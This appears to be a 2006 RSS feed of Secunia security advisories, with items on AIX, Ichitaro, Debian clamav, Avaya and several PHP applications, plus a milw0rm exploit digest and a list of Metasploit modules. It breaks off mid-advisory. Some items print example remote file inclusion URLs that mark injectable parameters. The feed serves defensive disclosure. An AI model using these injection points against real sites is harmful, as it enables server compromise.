	Select a product and view a complete list of all Patched/Unpatched Secunia advisories affecting it.<br>
<br>
Description:<br>
A vulnerability has been reported in IBM AIX, which can be exploited by malicious, local users to gain escalated privileges.<br>
<br>
The vulnerability is caused due to an unspecified error within the "setlocale()" function of libc.a.<br>
<br>
Solution:<br>
Apply temporary fix until APARs are available.<br>
<br>
Interim fix:<br>
ftp://aix.software.ibm.com/aix/efixes/security/setlocale_ifix.tar.Z<br>
<br>
APAR for AIX 5.1.0:<br>
IY88528 (available approx. 2006-09-06)<br>
<br>
APAR for AIX 5.2.0:<br>
IY88512 (available approx. 2006-09-06)<br>
<br>
APAR for AIX 5.3.0:<br>
IY88183 (available approx. 2006-09-06)<br>
<br>
Provided and/or discovered by:<br>
Reported by the vendor.<br>
]]></description>
            <link>http://secunia.com/advisories/21541/</link>
            <pubDate>Mon, 21 Aug 2006 09:10:29 -0400</pubDate>
        </item>

        <item>
            <title>Ichitaro Document Viewer Buffer Overflow Vulnerability</title>
            <description><![CDATA[Secunia Advisory:	SA21552	Print Advisory  <br>
Release Date:	2006-08-21<br>
<br>
Critical:	<br>
Extremely critical<br>
Impact:	System access<br>
Where:	From remote<br>
Solution Status:	Partial Fix<br>
<br>
Software:	Ichitaro 10.x<br>
Ichitaro 11.x<br>
Ichitaro 12.x<br>
Ichitaro 13.x<br>
Ichitaro 2004<br>
Ichitaro 2005<br>
Ichitaro 2006<br>
Ichitaro 9.x<br>
Ichitaro for Linux<br>
<br>
	Select a product and view a complete list of all Patched/Unpatched Secunia advisories affecting it.<br>
<br>
Description:<br>
A vulnerability has been reported in Ichitaro, which can be exploited by malicious people to compromise a user's system.<br>
<br>
The vulnerability is caused due to a boundary error when processing a specially crafted document. This can be exploited to cause a stack-based buffer overflow via an overly long string.<br>
<br>
Successful exploitation allows execution of arbitrary code.<br>
<br>
NOTE: The vulnerability is currently being actively exploited.<br>
<br>
Solution:<br>
Apply patch.<br>
<br>
Ichitaro 2005/2006:<br>
A patch was released on 2006-08-18.<br>
<br>
Ichitaro for Linux:<br>
A patch should be available soon.<br>
<br>
Provided and/or discovered by:<br>
Discovered in the wild as a so-called 0-day.<br>
<br>
Original Advisory:<br>
Justsystem (japanese):<br>
http://www.justsystem.co.jp/info/pd6002.html]]></description>
            <link>http://secunia.com/advisories/21552/</link>
            <pubDate>Mon, 21 Aug 2006 09:09:41 -0400</pubDate>
        </item>

        <item>
            <title>Exploit: Sonium Enterprise Adressbook &quot;folder&quot; File Inclusion Vulnerabilities</title>
            <description><![CDATA[Secunia Advisory:	SA21553	Print Advisory  <br>
Release Date:	2006-08-21<br>
<br>
Critical:	<br>
Highly critical<br>
Impact:	System access<br>
Where:	From remote<br>
Solution Status:	Unpatched<br>
<br>
Software:	Sonium Enterprise Adressbook 0.x<br>
<br>
	Select a product and view a complete list of all Patched/Unpatched Secunia advisories affecting it.<br>
<br>
Description:<br>
Philipp Niedziela has discovered some vulnerabilities in Sonium Enterprise Adressbook, which can be exploited by malicious users to compromise a vulnerable system.<br>
<br>
Input passed to the "folder" parameter in multiple files is not properly verified before being used to include files. This can be exploited to execute arbitrary PHP code by including files from local or external resources.<br>
<br>
Examples:<br>
http://[host]/plugins/1_Adressbuch/new.php?folder=[file]<br>
http://[host]/plugins/2_Branchen/edit.php?folder=[file]<br>
http://[host]/plugins/3_Typ/delete.php?folder=[file]<br>
<br>
More files under the "plugins" directory are affected.<br>
<br>
Successful exploitation requires that "register_globals" is enabled.<br>
<br>
The vulnerabilities have been confirmed in version 0.2. Other versions may also be affected.<br>
<br>
Solution:<br>
Edit the source code to ensure that input is properly verified.<br>
<br>
Restrict access to the "plugin" directory e.g. via a .htaccess file.<br>
<br>
Provided and/or discovered by:<br>
Philipp Niedziela<br>
<br>
Original Advisory:<br>
http://www.bb-pcsecurity.de/Webs...ook_Version_0.2_(folder)_RFI.htm<br>
<br>
<br>
]]></description>
            <link>http://secunia.com/advisories/21553/</link>
            <pubDate>Mon, 21 Aug 2006 09:08:44 -0400</pubDate>
        </item>

        <item>
            <title>Debian update for clamav</title>
            <description><![CDATA[Secunia Advisory:	SA21562	Print Advisory  <br>
Release Date:	2006-08-21<br>
<br>
Critical:	<br>
Highly critical<br>
Impact:	DoS<br>
System access<br>
Where:	From remote<br>
Solution Status:	Vendor Patch<br>
<br>
OS:	Debian GNU/Linux 3.1<br>
Debian GNU/Linux unstable alias sid<br>
<br>
	Select a product and view a complete list of all Patched/Unpatched Secunia advisories affecting it.<br>
<br>
CVE reference:	CVE-2006-4018<br>
<br>
Description:<br>
Debian has issued an update for clamav. This fixes a vulnerability, which can be exploited by malicious people to cause a DoS (Denial of Service) and potentially compromise a vulnerable system.<br>
<br>
For more information:<br>
SA21374<br>
<br>
Solution:<br>
Apply updated packages.<br>
<br>
-- Debian GNU/Linux 3.1 alias sarge --<br>
<br>
Source archives:<br>
<br>
http://security.debian.org/pool/...lamav/clamav_0.84-2.sarge.10.dsc<br>
Size/MD5 checksum: 874 579ac9552dbc0075d4d087042c231804<br>
http://security.debian.org/pool/...v/clamav_0.84-2.sarge.10.diff.gz<br>
Size/MD5 checksum: 176298 01bb523d1fd48f70a3277e12b965d426<br>
http://security.debian.org/pool/...c/clamav/clamav_0.84.orig.tar.gz<br>
Size/MD5 checksum: 4006624 c43213da01d510faf117daa9a4d5326c<br>
<br>
Architecture independent components:<br>
<br>
http://security.debian.org/pool/...mav-base_0.84-2.sarge.10_all.deb<br>
Size/MD5 checksum: 154834 aa3600fb1bccc896debdf371c6b94979<br>
http://security.debian.org/pool/...mav-docs_0.84-2.sarge.10_all.deb<br>
Size/MD5 checksum: 694360 6cd87074ba63f69e7cf065af1665839f<br>
http://security.debian.org/pool/...estfiles_0.84-2.sarge.10_all.deb<br>
Size/MD5 checksum: 123846 317f7c5a1fcba2c7502a7011edf07640<br>
<br>
Alpha architecture:<br>
<br>
http://security.debian.org/pool/...clamav_0.84-2.sarge.10_alpha.deb<br>
Size/MD5 checksum: 74756 ee20948ad40b44d08ea016becd29c59d<br>
http://security.debian.org/pool/...daemon_0.84-2.sarge.10_alpha.deb<br>
Size/MD5 checksum: 48832 1f24a23e371f0c7cec48123dbc62d87f<br>
http://security.debian.org/pool/...shclam_0.84-2.sarge.10_alpha.deb<br>
Size/MD5 checksum: 2176454 f76987654e839526da6d30ef50678fee<br>
http://security.debian.org/pool/...milter_0.84-2.sarge.10_alpha.deb<br>
Size/MD5 checksum: 42108 ca5ad43ec67d02f425db4cde24ea359c<br>
http://security.debian.org/pool/...av-dev_0.84-2.sarge.10_alpha.deb<br>
Size/MD5 checksum: 255698 b0c02ebb16c838039d25c837887e2b20<br>
http://security.debian.org/pool/...lamav1_0.84-2.sarge.10_alpha.deb<br>
Size/MD5 checksum: 285520 b7e6deae0b3f715ce64bd450fa1bed55<br>
<br>
AMD64 architecture:<br>
<br>
http://security.debian.org/pool/...clamav_0.84-2.sarge.10_amd64.deb<br>
Size/MD5 checksum: 68854 eeca1c599d8423fedbd7458c2823e675<br>
http://security.debian.org/pool/...daemon_0.84-2.sarge.10_amd64.deb<br>
Size/MD5 checksum: 44190 a9ffbdbf3145ed7ee1b09f754f6f1cba<br>
http://security.debian.org/pool/...shclam_0.84-2.sarge.10_amd64.deb<br>
Size/MD5 checksum: 2173266 b2bbfd444309513e0fbb0ffae9f7ca6f<br>
http://security.debian.org/pool/...milter_0.84-2.sarge.10_amd64.deb<br>
Size/MD5 checksum: 39992 c69a8afe5eb511d6d8fda40f4430acc4<br>
http://security.debian.org/pool/...av-dev_0.84-2.sarge.10_amd64.deb<br>
Size/MD5 checksum: 176430 114e0b901947b5c05e14863372b20371<br>
http://security.debian.org/pool/...lamav1_0.84-2.sarge.10_amd64.deb<br>
Size/MD5 checksum: 259648 34f48f60ab045c94bccdb2ef545c58bf<br>
<br>
ARM architecture:<br>
<br>
http://security.debian.org/pool/...v/clamav_0.84-2.sarge.10_arm.deb<br>
Size/MD5 checksum: 63940 0149c2854989385bc91dd7f3857c22de<br>
http://security.debian.org/pool/...v-daemon_0.84-2.sarge.10_arm.deb<br>
Size/MD5 checksum: 39602 3069d8dbd7134cdbe2aafbee73f394eb<br>
http://security.debian.org/pool/...reshclam_0.84-2.sarge.10_arm.deb<br>
Size/MD5 checksum: 2171302 36abc779119678735260f262abd46b14<br>
http://security.debian.org/pool/...v-milter_0.84-2.sarge.10_arm.deb<br>
Size/MD5 checksum: 37320 1a2b2bf609209bf679f1dc0595c014f5<br>
http://security.debian.org/pool/...amav-dev_0.84-2.sarge.10_arm.deb<br>
Size/MD5 checksum: 174866 dd1d6ecdae9b72d4370269553de7822c<br>
http://security.debian.org/pool/...bclamav1_0.84-2.sarge.10_arm.deb<br>
Size/MD5 checksum: 249684 ea978f5d747b263abbab696f3ee43d84<br>
<br>
Intel IA-32 architecture:<br>
<br>
http://security.debian.org/pool/.../clamav_0.84-2.sarge.10_i386.deb<br>
Size/MD5 checksum: 65192 65526868baf4727a43f50c3fc9d5bfaf<br>
http://security.debian.org/pool/...-daemon_0.84-2.sarge.10_i386.deb<br>
Size/MD5 checksum: 40314 3dcbd76b10f316cb966c9d0481c86d95<br>
http://security.debian.org/pool/...eshclam_0.84-2.sarge.10_i386.deb<br>
Size/MD5 checksum: 2171614 56f381689bb923aff94ea1c089c972e6<br>
http://security.debian.org/pool/...-milter_0.84-2.sarge.10_i386.deb<br>
Size/MD5 checksum: 38036 0ba3584e974098cacb54356f01ba5b81<br>
http://security.debian.org/pool/...mav-dev_0.84-2.sarge.10_i386.deb<br>
Size/MD5 checksum: 159624 f1df89303a47b8feadb0cc34a3af524e<br>
http://security.debian.org/pool/...clamav1_0.84-2.sarge.10_i386.deb<br>
Size/MD5 checksum: 254320 fa8338410aacfed8a7699cb2e89f2f24<br>
<br>
Intel IA-64 architecture:<br>
<br>
http://security.debian.org/pool/.../clamav_0.84-2.sarge.10_ia64.deb<br>
Size/MD5 checksum: 81812 24394b30b3d05645157d681e31e4a334<br>
http://security.debian.org/pool/...-daemon_0.84-2.sarge.10_ia64.deb<br>
Size/MD5 checksum: 55236 0547745bea0ea7c00874cb28bb8c6076<br>
http://security.debian.org/pool/...eshclam_0.84-2.sarge.10_ia64.deb<br>
Size/MD5 checksum: 2180240 bb88c2a0b8d3954e4c8c0bb2eb254626<br>
http://security.debian.org/pool/...-milter_0.84-2.sarge.10_ia64.deb<br>
Size/MD5 checksum: 49200 e89b9424d435e4b54b5541310df54d18<br>
http://security.debian.org/pool/...mav-dev_0.84-2.sarge.10_ia64.deb<br>
Size/MD5 checksum: 252048 307a1171d4d24ec18b405300c8abc8c3<br>
http://security.debian.org/pool/...clamav1_0.84-2.sarge.10_ia64.deb<br>
Size/MD5 checksum: 317632 f26a3c8aa9686fe1325f19ceb21ae876<br>
<br>
HP Precision architecture:<br>
<br>
http://security.debian.org/pool/.../clamav_0.84-2.sarge.10_hppa.deb<br>
Size/MD5 checksum: 68266 53f9a7dc51264112fa03824a6f159a55<br>
http://security.debian.org/pool/...-daemon_0.84-2.sarge.10_hppa.deb<br>
Size/MD5 checksum: 43282 2cd52c92c09be751c18871aa1779e412<br>
http://security.debian.org/pool/...eshclam_0.84-2.sarge.10_hppa.deb<br>
Size/MD5 checksum: 2173738 3b5b881e2c5a9e68ea3ef9181acb8f00<br>
http://security.debian.org/pool/...-milter_0.84-2.sarge.10_hppa.deb<br>
Size/MD5 checksum: 39448 452a3eca157ec974030633ecd149f1d7<br>
http://security.debian.org/pool/...mav-dev_0.84-2.sarge.10_hppa.deb<br>
Size/MD5 checksum: 202646 f11e31f03249e881007664e1fe68e575<br>
http://security.debian.org/pool/...clamav1_0.84-2.sarge.10_hppa.deb<br>
Size/MD5 checksum: 283402 84b6b57ffe3d653db556102896b32d73<br>
<br>
Motorola 680x0 architecture:<br>
<br>
http://security.debian.org/pool/.../clamav_0.84-2.sarge.10_m68k.deb<br>
Size/MD5 checksum: 62518 cc621b1387c92be1ac653e05f3ca5971<br>
http://security.debian.org/pool/...-daemon_0.84-2.sarge.10_m68k.deb<br>
Size/MD5 checksum: 38206 36154fc4bd779e3ab9ac3eb51ea0f833<br>
http://security.debian.org/pool/...eshclam_0.84-2.sarge.10_m68k.deb<br>
Size/MD5 checksum: 2170522 8b576066f0b981f9e55b4400f6ecbe69<br>
http://security.debian.org/pool/...-milter_0.84-2.sarge.10_m68k.deb<br>
Size/MD5 checksum: 35060 61a22458f305bd2c28834c62cdaa9e9a<br>
http://security.debian.org/pool/...mav-dev_0.84-2.sarge.10_m68k.deb<br>
Size/MD5 checksum: 146266 0fbd30a2c656ef6ec0d75c010aedb5a4<br>
http://security.debian.org/pool/...clamav1_0.84-2.sarge.10_m68k.deb<br>
Size/MD5 checksum: 250410 8b804dadd0fc35420d477228d254d543<br>
<br>
Big endian MIPS architecture:<br>
<br>
http://security.debian.org/pool/.../clamav_0.84-2.sarge.10_mips.deb<br>
Size/MD5 checksum: 67948 5c5216d18d7d584a5f0859f0094aa417<br>
http://security.debian.org/pool/...-daemon_0.84-2.sarge.10_mips.deb<br>
Size/MD5 checksum: 43792 512afdde1b2da6791bd463de827449f4<br>
http://security.debian.org/pool/...eshclam_0.84-2.sarge.10_mips.deb<br>
Size/MD5 checksum: 2173022 48dae648fe0713d6afc79127838d5271<br>
http://security.debian.org/pool/...-milter_0.84-2.sarge.10_mips.deb<br>
Size/MD5 checksum: 37672 e34c78057e3f92367bd8591364550e3c<br>
http://security.debian.org/pool/...mav-dev_0.84-2.sarge.10_mips.deb<br>
Size/MD5 checksum: 195464 1fb3cda50e0d5c2db77ae4fb985516e7<br>
http://security.debian.org/pool/...clamav1_0.84-2.sarge.10_mips.deb<br>
Size/MD5 checksum: 257498 0262d853aa80aa7a58d19a2eca3b44e8<br>
<br>
Little endian MIPS architecture:<br>
<br>
http://security.debian.org/pool/...lamav_0.84-2.sarge.10_mipsel.deb<br>
Size/MD5 checksum: 67554 4185522ad02b337b9da6663cbd1024ac<br>
http://security.debian.org/pool/...aemon_0.84-2.sarge.10_mipsel.deb<br>
Size/MD5 checksum: 43592 fb26021b07612a92028d8830f6ff3804<br>
http://security.debian.org/pool/...hclam_0.84-2.sarge.10_mipsel.deb<br>
Size/MD5 checksum: 2173004 9193ea804f2b7c19548417165178ca05<br>
http://security.debian.org/pool/...ilter_0.84-2.sarge.10_mipsel.deb<br>
Size/MD5 checksum: 37960 2030dcaed3d04a2d7a918940e310d280<br>
http://security.debian.org/pool/...v-dev_0.84-2.sarge.10_mipsel.deb<br>
Size/MD5 checksum: 191886 2b3158916a4251c4d5a5381ebb49c838<br>
http://security.debian.org/pool/...amav1_0.84-2.sarge.10_mipsel.deb<br>
Size/MD5 checksum: 255096 3bf9a5cee57791754a88bbb96a2c6fc0<br>
<br>
PowerPC architecture:<br>
<br>
http://security.debian.org/pool/...amav_0.84-2.sarge.10_powerpc.deb<br>
Size/MD5 checksum: 69290 63e95304cf75bbc09fdcdc74b5065e81<br>
http://security.debian.org/pool/...emon_0.84-2.sarge.10_powerpc.deb<br>
Size/MD5 checksum: 44666 000b1226fe5f62d5dab412f302ee2624<br>
http://security.debian.org/pool/...clam_0.84-2.sarge.10_powerpc.deb<br>
Size/MD5 checksum: 2173672 d72f0dbd55ddf72f68b7455b39318593<br>
http://security.debian.org/pool/...lter_0.84-2.sarge.10_powerpc.deb<br>
Size/MD5 checksum: 38866 3cbd90828e563181db163c8f2be59dbf<br>
http://security.debian.org/pool/...-dev_0.84-2.sarge.10_powerpc.deb<br>
Size/MD5 checksum: 187672 529b30228ccd9858381953ef29a1a799<br>
http://security.debian.org/pool/...mav1_0.84-2.sarge.10_powerpc.deb<br>
Size/MD5 checksum: 264866 3b4f8f04c88d0ae27db4c37d43adb7b8<br>
<br>
IBM S/390 architecture:<br>
<br>
http://security.debian.org/pool/.../clamav_0.84-2.sarge.10_s390.deb<br>
Size/MD5 checksum: 67900 6025940acf3fd7317140990d3b767598<br>
http://security.debian.org/pool/...-daemon_0.84-2.sarge.10_s390.deb<br>
Size/MD5 checksum: 43556 9121cc8c74337e8fc8df83b6f4d317aa<br>
http://security.debian.org/pool/...eshclam_0.84-2.sarge.10_s390.deb<br>
Size/MD5 checksum: 2172970 b76417d453c968451ca19abff7f3b1cf<br>
http://security.debian.org/pool/...-milter_0.84-2.sarge.10_s390.deb<br>
Size/MD5 checksum: 38934 c6ba23cdab5a45fd0ed314ac85537ad6<br>
http://security.debian.org/pool/...mav-dev_0.84-2.sarge.10_s390.deb<br>
Size/MD5 checksum: 182620 0d27f0ef5d3e2e530486ec2391f1ee0d<br>
http://security.debian.org/pool/...clamav1_0.84-2.sarge.10_s390.deb<br>
Size/MD5 checksum: 269456 272e24025e52efd9c7b1f41c3f92765e<br>
<br>
Sun Sparc architecture:<br>
<br>
http://security.debian.org/pool/...clamav_0.84-2.sarge.10_sparc.deb<br>
Size/MD5 checksum: 64430 6a3177a86caaf0b5a1a9709c85e56749<br>
http://security.debian.org/pool/...daemon_0.84-2.sarge.10_sparc.deb<br>
Size/MD5 checksum: 39468 81982545aa069ecface4252e0892f57e<br>
http://security.debian.org/pool/...shclam_0.84-2.sarge.10_sparc.deb<br>
Size/MD5 checksum: 2171174 a7f6fb7b6e0948a598d7a85c12c5f1d5<br>
http://security.debian.org/pool/...milter_0.84-2.sarge.10_sparc.deb<br>
Size/MD5 checksum: 36856 37da7d38dfbeebdcb933892eb7826cab<br>
http://security.debian.org/pool/...av-dev_0.84-2.sarge.10_sparc.deb<br>
Size/MD5 checksum: 175820 3af502c16ea8a016050d84a24bc9278f<br>
http://security.debian.org/pool/...lamav1_0.84-2.sarge.10_sparc.deb<br>
Size/MD5 checksum: 264768 d9b5237456cfe44294020c771982b8c3<br>
<br>
-- Debian GNU/Linux unstable alias sid --<br>
<br>
Fixed in version 0.88.4-2.<br>
<br>
Original Advisory:<br>
http://www.us.debian.org/security/2006/dsa-1153<br>
<br>
Other References:<br>
SA21374:<br>
http://secunia.com/advisories/21374/<br>
]]></description>
            <link>http://secunia.com/advisories/21562/</link>
            <pubDate>Mon, 21 Aug 2006 09:08:03 -0400</pubDate>
        </item>

        <item>
            <title>Avaya Products PHP Multiple Vulnerabilities</title>
            <description><![CDATA[Secunia Advisory:	SA21564	Print Advisory  <br>
Release Date:	2006-08-21<br>
<br>
Critical:	<br>
Moderately critical<br>
Impact:	Security Bypass<br>
Cross Site Scripting<br>
DoS<br>
System access<br>
Where:	From remote<br>
Solution Status:	Unpatched<br>
<br>
OS:	Avaya Converged Communications Server (CCS) 2.x<br>
Avaya Converged Communications Server (CCS) 3.x<br>
Avaya Intuity LX<br>
Avaya Message Networking 2.x<br>
Avaya S8XXX Media Servers<br>
Avaya SIP Enablement Services (SES) 3.x<br>
<br>
	Select a product and view a complete list of all Patched/Unpatched Secunia advisories affecting it.<br>
<br>
CVE reference:	CVE-2006-0208<br>
CVE-2006-0996<br>
CVE-2006-1990<br>
CVE-2005-2933<br>
<br>
Description:<br>
Avaya has acknowledged some vulnerabilities in PHP included in various Avaya products, which can be exploited by malicious users to cause a DoS (Denial of Service) or compromise a vulnerable system, and by malicious people to conduct cross-site scripting attacks and potentially compromise a vulnerable system.<br>
<br>
For more information:<br>
SA17062<br>
SA18431<br>
SA19599<br>
SA19803<br>
<br>
The following products are affected:<br>
* Avaya S87XX/S8500/S8300 (all versions)<br>
* Avaya Intuity LX (all versions)<br>
* Avaya Message Networking (all versions)<br>
* Avaya CCS/SES (all versions)]]></description>
            <link>http://secunia.com/advisories/21564/</link>
            <pubDate>Mon, 21 Aug 2006 09:07:29 -0400</pubDate>
        </item>

        <item>
            <title>Exploit: Fantastic News &quot;CONFIG[script_path]&quot; File Inclusion Vulnerability</title>
            <description><![CDATA[Secunia Advisory:	SA21571	Print Advisory  <br>
Release Date:	2006-08-21<br>
<br>
Critical:	<br>
Highly critical<br>
Impact:	System access<br>
Where:	From remote<br>
Solution Status:	Vendor Patch<br>
<br>
Software:	Fantastic News 2.x<br>
<br>
	Select a product and view a complete list of all Patched/Unpatched Secunia advisories affecting it.<br>
<br>
Description:<br>
SHiKaA has reported a vulnerability in Fantastic News, which can be exploited by malicious people to compromise a vulnerable system.<br>
<br>
Input passed to the "CONFIG[script_path]" parameter in news.php is not properly verified before being used to include files. This can be exploited to execute arbitrary PHP code by including files from local or external resources.<br>
<br>
The vulnerability has been reported in version 2.1.3. Other versions may also be affected.<br>
<br>
Solution:<br>
The vulnerability has reportedly been fixed in version 2.1.4.<br>
<br>
Provided and/or discovered by:<br>
SHiKaA<br>
<br>
Original Advisory:<br>
http://milw0rm.com/exploits/2221]]></description>
            <link>http://secunia.com/advisories/21571/</link>
            <pubDate>Mon, 21 Aug 2006 09:06:57 -0400</pubDate>
        </item>

        <item>
            <title>Exploit: Tutti Nova &quot;TNLIB_DIR&quot; File Inclusion Vulnerabilities</title>
            <description><![CDATA[Secunia Advisory:	SA21572	Print Advisory  <br>
Release Date:	2006-08-21<br>
<br>
Critical:	<br>
Highly critical<br>
Impact:	System access<br>
Where:	From remote<br>
Solution Status:	Unpatched<br>
<br>
Software:	Tutti Nova 1.x<br>
<br>
	Select a product and view a complete list of all Patched/Unpatched Secunia advisories affecting it.<br>
<br>
Description:<br>
SHiKaA has discovered some vulnerabilities in Tutti Nova, which can be exploited by malicious people to compromise a vulnerable system.<br>
<br>
Input passed to the "TNLIB_DIR" parameter in multiple files is not properly verified before being used to include files. This can be exploited to execute arbitrary PHP code by including files from local or external resources.<br>
<br>
Examples:<br>
http://[host]/include/novalib/class.novaEdit.mysql.php?TNLIB_DIR=[file]<br>
http://[host]/include/novalib/class.novaAdmin.mysql.php?TNLIB_DIR=[file]<br>
http://[host]/include/novalib/class.novaRead.mysql.php?TNLIB_DIR=[file]<br>
<br>
Successful exploitation requires that "register_globals" is enabled.<br>
<br>
The vulnerabilities have been confirmed in version 1.6. Other versions may also be affected.<br>
<br>
Solution:<br>
Edit the source code to ensure that input is properly verified.<br>
<br>
Restrict access to the "include" directory e.g. via a .htaccess file.<br>
<br>
Provided and/or discovered by:<br>
SHiKaA<br>
<br>
Original Advisory:<br>
http://milw0rm.com/exploits/2220]]></description>
            <link>http://secunia.com/advisories/21572/</link>
            <pubDate>Mon, 21 Aug 2006 09:06:12 -0400</pubDate>
        </item>

        <item>
            <title>Exploit: PHlyMail Lite &quot;_PM_[path][handler]&quot; File Inclusion Vulnerability</title>
            <description><![CDATA[Secunia Advisory:	SA21582	Print Advisory  <br>
Release Date:	2006-08-21<br>
<br>
Critical:	<br>
Highly critical<br>
Impact:	System access<br>
Where:	From remote<br>
Solution Status:	Unpatched<br>
<br>
Software:	PHlyMail Lite 3.x<br>
<br>
	Select a product and view a complete list of all Patched/Unpatched Secunia advisories affecting it.<br>
<br>
Description:<br>
Kacper has discovered a vulnerability in PHlyMail Lite, which can be exploited by malicious people to compromise a vulnerable system.<br>
<br>
Input passed to the "_PM_[path][handler]" parameter in handlers/email/mod.listmail.php is not properly verified before being used to include files. This can be exploited to execute arbitrary PHP code by including files from local or external resources.<br>
<br>
Successful exploitation requires that "register_globals" is enabled.<br>
<br>
The vulnerability has been confirmed in version 3.4.4 (Build 3.04.04). Other versions may also be affected.<br>
<br>
Solution:<br>
Edit the source code to ensure that input is properly verified.<br>
<br>
Set "register_globals" to "Off".<br>
<br>
Provided and/or discovered by:<br>
Kacper<br>
<br>
Original Advisory:<br>
http://milw0rm.com/exploits/2211<br>
]]></description>
            <link>http://secunia.com/advisories/21582/</link>
            <pubDate>Mon, 21 Aug 2006 09:05:35 -0400</pubDate>
        </item>

        <item>
            <title>WebAdmin Account Manipulation and Arbitrary File Disclosure</title>
            <description><![CDATA[Secunia Advisory:	SA21558	Print Advisory  <br>
Release Date:	2006-08-21<br>
<br>
Critical:	<br>
Less critical<br>
Impact:	Manipulation of data<br>
Exposure of system information<br>
Exposure of sensitive information<br>
Where:	From remote<br>
Solution Status:	Vendor Patch<br>
<br>
Software:	WebAdmin 3.x<br>
<br>
	Select a product and view a complete list of all Patched/Unpatched Secunia advisories affecting it.<br>
<br>
Description:<br>
Some vulnerabilities have been reported in WebAdmin, which can be exploited by certain malicious users to manipulate or gain knowledge of sensitive information.<br>
<br>
1) Input validation errors in logfile_view.wdm and configfile_view.wdm makes it possible for a global administrative user to view arbitrary files via a specially crafted URL.<br>
<br>
2) It possible for a domain administrative user to edit a global administrative user's account. This can be exploited to change the password and then login as the global administrative user.<br>
<br>
Solution:<br>
Update to version 3.25.<br>
<br>
Provided and/or discovered by:<br>
Reported by the vendor.<br>
<br>
<br>
]]></description>
            <link>http://secunia.com/advisories/21558/</link>
            <pubDate>Mon, 21 Aug 2006 09:05:16 -0400</pubDate>
        </item>

        <item>
            <title>Milw0rm has lots of new exploits</title>
            <description><![CDATA[Going to start releasing daily milw0rm exploits in a digest fashion
<br>
2006-08-14	Cyrus IMAPD 2.3.2 (pop3d) Remote Buffer Overflow Exploit (3)<br>
2006-08-16	PHP <= 4.4.3 / 5.1.4 (sscanf) Local Buffer Overflow Exploit<br>
2006-08-18	Joomla Artlinks Component <= 1.0b4 Remote Include Vulnerability
2006-08-18	PHlyMail Lite <= 3.4.4 (mod.listmail.php) Remote Include Vulnerability
2006-08-18	phpCodeGenie <= 3.0.2 (BEAUT_PATH) Remote File Include Vulnerability
2006-08-17	Woltlab Burning Board <= 2.3.5 (links.php) SQL Injection Exploit (2)
2006-08-17	CubeCart <= 3.0.11 (oid) Remote Blind SQL Injection Exploit
2006-08-17	IRSR <= 0.2 (_sysSessionPath) Remote File Include Vulnerability
2006-08-17	WTcom <= 0.2.4-alpha (torrents.php) Remote SQL Injection Vulnerability
2006-08-17	POWERGAP <= 2003 (s0x.php) Remote File Include Vulnerability
2006-08-17	Mambo mambelfish Component <= 1.1 Remote File Include Vulnerability
2006-08-17	Joomla com_jim Component <= 1.0.1 Remote File Include Vulnerability
2006-08-17	Joomla Mosets Tree <= 1.0 Remote File Include Vulnerability
2006-08-17	Mambo phpShop Component <= 1.2 RC2b File Include Vulnerability
2006-08-17	Mambo a6mambocredits Component 1.0.0 File Include Vulnerability
2006-08-16	dotProject <= 2.0.4 (baseDir) Remote File Include Vulnerability
2006-08-16	OPT Max <= 1.2.0 (CRM_inc) Remote File Include Vulnerability
2006-08-16	Mambo CopperminePhotoGalery Component Remote Include Vulnerability
2006-08-15	WEBInsta MM <= 1.3e (absolute_path) Remote File Include Exploit
2006-08-15	Discloser <= 0.0.4 (fileloc) Remote File Include Vulnerabilities
2006-08-15	WEBInsta CMS <= 0.3.1 (users.php) Remote File Include Vulnerability
2006-08-15	PHProjekt <= 5.1 Multiple Remote File Include Vulnerabilities
2006-08-14	phPay <= 2.02 (nu_mail.inc.php) Remote mail() Injection Exploit<br>
2006-08-14	Mambo mmp Component <= 1.2 Remote File Include Vulnerability
2006-08-14	ProjectButler <= 0.8.4 (rootdir) Remote File Include Vulnerabilities
2006-08-14	Mambo Peoplebook Component 1.0 Remote File Include Vulnerability
2006-08-14	Spidey Blog Script <== 1.5 (tr) Remote SQL Injection Vulnerability
2006-08-13	Joomla Webring Component <= 1.0 Remote Include Vulnerability
2006-08-13	XMB <= 1.9.6 Final basename() Remote Command Execution Exploit
2006-08-12	WEBinsta CMS <= 0.3.1 (templates_dir) Remote File Include Exploit
2006-08-11	Wheatblog <= 1.1 (session.php) Remote File Include Vulnerability
2006-08-10	SAPID CMS <= 1.2.3_rc3 (rootpath) Remote Code Execution Exploit<br>
2006-08-18	Macromedia Flash 9 (IE Plugin) Remote Denial of Service Crash Exploit
2006-08-18	MS Windows PNG File IHDR Block Denial of Service Exploit PoC (c) (2)
2006-08-17	MS Windows PNG File IHDR Block Denial of Service Exploit PoC (c)
2006-08-16	MS Windows PNG File IHDR Block Denial of Service Exploit PoC
2006-08-16	VMware 5.5.1 COM Object Arbitrary Partition Table Delete Exploit
2006-08-13	Nokia Symbian 60 3rd Edition Browser Denial of Service Crash
2006-08-13	Opera 9 IRC Client Remote Denial of Service Exploit (c)
2006-08-13	Opera 9 IRC Client Remote Denial of Service Exploit (py)
]]></description>
            <link>http://milw0rm.com/</link>
            <pubDate>Fri, 18 Aug 2006 13:58:14 -0400</pubDate>
        </item>

        <item>
            <title>6 New Metasploit Modules</title>
            <description>&lt;br&gt;
[ 08/10/2006 ] New exploit module added: netapi_ms06_040&lt;br&gt;
[ 08/10/2006 ] New exploit module added: ie_createobject&lt;br&gt;
[ 08/10/2006 ] New exploit module added: eiq_license&lt;br&gt;
[ 08/10/2006 ] New exploit module added: realvnc_client&lt;br&gt;
[ 08/10/2006 ] New exploit module added: securecrt_ssh1&lt;br&gt;
[ 08/10/2006 ] New exploit module added: mercury_imap&lt;br&gt;</description>
            <link>http://www.metasploit.com/projects/Framework/</link>
            <pubDate>Fri, 18 Aug 2006 13:57:44 -0400</pubDate>
        </item>

        <item>
            <title>AlsaPlayer Multiple Buffer Overflow Vulnerabilities</title>
            <description><![CDATA[Secunia Advisory:	SA21422	Print Advisory  <br>
Release Date:	2006-08-10<br>
<br>
Critical:	<br>
Highly critical<br>
Impact:	DoS<br>
System access<br>
Where:	From remote<br>
Solution Status:	Unpatched<br>
<br>
Software:	AlsaPlayer 0.x<br>
<br>
	Select a product and view a complete list of all Patched/Unpatched Secunia advisories affecting it.<br>
<br>
Description:<br>
Luigi Auriemma has reported some vulnerabilities in AlsaPlayer, which potentially can be exploited by malicious people to compromise a user's system.<br>
<br>
1) A boundary error exists in the "reconnect()" function in reader/http/http.c during the handling of HTTP connections. This can be exploited to cause a stack-based buffer overflow when receiving a specially crafted "Location" HTTP response header.<br>
<br>
Successful exploitation may allow execution of arbitrary code, but requires that the client connects to a malicious server.<br>
<br>
